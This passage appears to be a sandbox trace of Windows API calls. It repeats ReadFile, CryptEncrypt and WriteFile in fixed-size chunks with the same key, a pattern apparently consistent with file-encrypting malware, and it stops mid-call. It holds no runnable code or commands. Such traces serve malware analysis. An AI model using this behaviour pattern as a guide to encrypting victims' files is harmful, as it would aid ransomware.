[0275.997] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.997] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.997] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.997] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.997] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.997] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.997] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.998] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.998] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.998] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.998] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.998] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.998] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.998] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.998] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.998] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.998] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.998] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.998] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.998] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.998] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.998] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.999] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.999] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.999] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.999] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.999] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.999] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.999] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.999] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.999] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.999] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.999] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.999] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.999] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.999] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.000] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.000] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.000] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.000] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.000] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.000] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.000] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.000] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.000] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.000] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.000] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.000] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.000] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.000] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.000] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.001] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.001] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.001] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.001] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.001] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.001] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.001] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.001] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.001] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.001] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.001] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.001] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.001] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.002] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.002] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.002] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.002] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.002] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.002] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.002] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.002] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.002] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.002] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.002] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.002] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.002] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.002] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.002] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.003] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.003] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.003] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.003] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.003] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.003] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.003] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.003] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.003] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.003] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.003] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.003] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.003] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.003] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.003] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.004] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.004] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.004] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.004] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.004] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.004] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.004] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.004] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.004] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, 